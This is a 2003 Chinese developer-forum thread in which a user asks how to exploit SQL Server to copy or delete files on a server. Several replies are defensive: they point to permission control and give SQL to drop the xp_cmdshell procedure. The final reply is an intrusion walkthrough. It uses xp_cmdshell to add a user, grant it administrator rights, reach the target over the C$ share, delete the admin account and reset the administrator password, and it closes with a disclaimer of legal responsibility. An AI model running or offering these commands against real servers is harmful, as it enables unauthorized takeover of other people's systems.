3.4w+
社区成员
怎么样利用sqlserver的漏洞?
不知道大家发现了没有,sqlserver装在服务器上,我们在客户端注册到服务器上,如果要用企业管理器备份服务器上的数据时,便会看到服务器上所有的盘符和所有的文件!!我们怎么能利用这个漏洞对服务器上的文件进行操作呢,比如说考拷贝,或删除呢?
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
zjcxc 元老 2003-12-09
利用的话,就调用xp_cmdshell.但也要有管理员管理.
- 打赏
- 举报
w_rose 2003-12-09
谁让你允许任何人都能够有sa/dbo身份的?
大部分人(超过80%),对安全性问题基本上无知无畏。少部分人(超过15%),包括我,只有很少一点知识和经验。其实根本不用“删除xp_cmdshell”或者“过滤用户命令”等临时应付的办法,好好规范每一个访客的操作范围就行了。
大部分人(超过80%),对安全性问题基本上无知无畏。少部分人(超过15%),包括我,只有很少一点知识和经验。其实根本不用“删除xp_cmdshell”或者“过滤用户命令”等临时应付的办法,好好规范每一个访客的操作范围就行了。
- 打赏
- 举报
w_rose 2003-12-09
谁允许你开发服务器上的磁盘目录访问权限的?
- 打赏
- 举报
zjcxc 元老 2003-12-09
通过权限限制就行了.
- 打赏
- 举报
lynx1111 2003-12-09
楼上说的只有SA级别权限的才能使用xp_cmdshell
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- 打赏
- 举报
Arionma 2003-12-09
这需要管理员权限。
- 打赏
- 举报
txlicenhe 2003-12-09
http://expert.csdn.net/Expert/topic/2343/2343814.xml?temp=.7005121
本地装个sqlserver,用查询分析器登陆对方后:
exec xp_cmdshell 'net user mm 123 /add' --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码:
xp_cmdshell 'net user administrator "123"'
若引起法律责任,概不负责。
本地装个sqlserver,用查询分析器登陆对方后:
exec xp_cmdshell 'net user mm 123 /add' --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码:
xp_cmdshell 'net user administrator "123"'
若引起法律责任,概不负责。
- 打赏
- 举报